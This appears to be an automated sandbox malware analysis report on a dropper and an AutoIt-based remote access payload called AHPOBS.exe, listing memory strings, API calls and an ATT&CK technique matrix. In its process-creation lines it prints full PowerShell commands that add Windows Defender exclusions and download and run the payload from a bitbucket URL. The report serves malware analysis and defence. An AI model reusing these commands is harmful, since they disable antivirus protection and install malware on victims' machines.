              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dexcz2memstr_30658268-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dexczhmemstr_47a1dd82-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: laptopgmemstr_5ddb3f5e-d
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: desktop$memstr_f9cb70ac-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: porsdmemstr_80960326-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h"n}d,memstr_65d8f273-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _filereadtoarraymemstr_675ceb4c-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _filelisttoarraymemstr_b7d8e24b-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupcommondirmemstr_7c672c96-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tcpevent_disconnectmemstr_17a351a8-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sw_showminnoactivememstr_8e292c22-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \microsoft\wlansvc_memstr_5a4068b9-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _filelisttoarrayvmemstr_12831786-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uncryptrdppassword,memstr_3509499a-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uncryptrdppasswordmemstr_69c35a3f-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fddsf43memstr_42a9e608-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bkeysmemstr_add61010-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: faze46wmemstr_ceb3251f-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: win32xhmemstr_f02d4f2f-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: faze46memstr_b638d0ac-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboui2memstr_d27cb5e2-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mgxcli#memstr_043526f4-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mgxclimemstr_86735724-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mouxcmemstr_db9fdd1e-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: begincvmemstr_1a6e6742-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oedssp.memstr_56025754-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: actqusmemstr_fcaf7dd6-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ddddd-memstr_90ff83a6-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vcersmemstr_abd578f0-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pprprprmemstr_f031b4a4-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: imgclimemstr_b0e1830e-9
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: betabtamemstr_770c5753-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x3x3x3memstr_2a03bbc4-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x2x2x2memstr_7cee1820-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hosts4memstr_ae0a265d-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ddfdztymemstr_f26883a1-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uuxxxymemstr_19066b67-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: betaimemstr_17c77772-2
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe Code function: 10_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00434418
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe Code function: 10_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,10_2_0043333C
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe;
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\AHPOBS.exe C:\Users\user\AppData\Local\Temp\AHPOBS.exe ;
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe Code function: 10_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00446124
              Source: AHPOBS.exe, 0000000A.00000002.3917281213.0000000003FAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
              Source: AHPOBS.exe Binary or memory string: Shell_TrayWnd
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Class:Shell_TrayWnd]w
              Source: AHPOBS.exe, 0000000A.00000000.2381208135.0000000000482000.00000002.00000001.01000000.00000005.sdmp, AHPOBS.exe, 0000000A.00000003.2555385541.000000000453C000.00000004.00000020.00020000.00000000.sdmp, AHPOBS.exe, 0000000A.00000003.2555058983.0000000004417000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
              Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe Code function: 10_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,10_2_004720DB
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe Code function: 10_2_00472C3F GetUserNameW,10_2_00472C3F
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe Code function: 10_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,10_2_0041E364
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe Code function: 10_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,10_2_0040E500
              Source: AHPOBS.exe, 0000000A.00000002.3916841714.0000000000C03000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AntiVirusProductWindows Defender{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}windowsdefender://%ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: AHPOBS.exe, 0000000A.00000002.3916841714.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, AHPOBS.exe, 0000000A.00000002.3916841714.0000000000C03000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

              Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: AHPOBS.exe PID: 6756, type: MEMORYSTR
Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_XP
Source: AHPOBS.exe.6.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: AHPOBS.exe | Binary or memory string: WIN_XPe
Source: AHPOBS.exe | Binary or memory string: WIN_VISTA
Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_XPe)
Source: AHPOBS.exe, 0000000A.00000002.3917281213.0000000003FAA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_8
Source: AHPOBS.exe | Binary or memory string: WIN_7
Source: AHPOBS.exe | Binary or memory string: WIN_8
Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_VISTAR
Source: Yara match | File source: 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: AHPOBS.exe PID: 6756, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: Process Memory Space: AHPOBS.exe PID: 6756, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, | 10_2_0046CEF3
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, | 10_2_004652BE
Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, | 10_2_00476619

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information11
              Scripting
              2
              Valid Accounts
              1
              Windows Management Instrumentation
              11
              Scripting
              1
              Exploitation for Privilege Escalation
              11
              Disable or Modify Tools
              21
              Input Capture
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              2
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              LSASS Memory1
              Account Discovery
              Remote Desktop Protocol21
              Input Capture
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell
              2
              Valid Accounts
              2
              Valid Accounts
              2
              Obfuscated Files or Information
              Security Account Manager3
              File and Directory Discovery
              SMB/Windows Admin Shares3
              Clipboard Data
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
              Access Token Manipulation
              1
              DLL Side-Loading
              NTDS15
              System Information Discovery
              Distributed Component Object ModelInput Capture3
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
              Process Injection
              1
              Masquerading
              LSA Secrets251
              Security Software Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Valid Accounts
              Cached Domain Credentials31
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
              Virtualization/Sandbox Evasion
              DCSync3
              Process Discovery
